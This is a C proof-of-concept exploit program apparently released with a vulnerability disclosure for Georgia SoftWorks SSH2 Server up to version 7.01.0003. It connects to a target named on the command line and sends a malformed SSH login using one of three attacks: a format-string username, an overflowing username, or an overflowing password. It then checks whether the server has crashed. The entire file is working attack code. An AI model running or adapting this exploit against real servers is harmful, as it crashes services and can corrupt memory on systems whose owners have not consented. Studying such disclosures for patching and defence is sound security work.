/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include <libssh2.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        22



void bigstr(u8 *dst, int chr, int len);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    LIBSSH2_SESSION *session;
    LIBSSH2_CHANNEL *channel;
    struct  sockaddr_in peer;
    int     sd,
            attack;
    u16     port    = PORT;
    u8      username[10500],
            password[850];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Georgia SoftWorks SSH2 Server <= 7.01.0003 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = format string in the log function\n"
            " 2 = buffer-overflow in the log function\n"
            " 3 = buffer-overflow in the handling of the password\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);
    switch(attack) {
        case 1: {
            strcpy(username, "%n%n%n%s%s%n%n");
            strcpy(password, "password");
            } break;
        case 2: {
            bigstr(username, 'A', sizeof(username) - 1);
            strcpy(password, "password");
            } break;
        case 3: {
            strcpy(username, "administrator");
            bigstr(password, 'A', sizeof(password) - 1);
            } break;
        default: {
            printf("\nError: wrong attack number (%d)\n", attack);
            exit(1);
            } break;
    }

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    session = libssh2_session_init();
    if(!session) goto quit;

    if(libssh2_session_startup(session, sd)) goto quit;

    if(!libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_MD5)) goto quit;

    printf("- send malformed data\n");
    if(!libssh2_userauth_password(session, username, password)) {
        if(attack == 3) {
            channel = libssh2_channel_open_session(session);
            if(channel) libssh2_channel_shell(channel);
        }
    }

    close(sd);

    printf("- wait some seconds\n");
    sleep(ONESEC * 3);

    printf("- check server:\n");
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
        printf("\n  Server IS vulnerable!!!\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n");
    }
    close(sd);
    return(0);
quit:
    printf("\nError: problems during the SSH communication\n");
    close(sd);
    return(0);
}



void bigstr(u8 *dst, int chr, int len) {
    memset(dst, chr, len);
    dst[len] = 0;
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


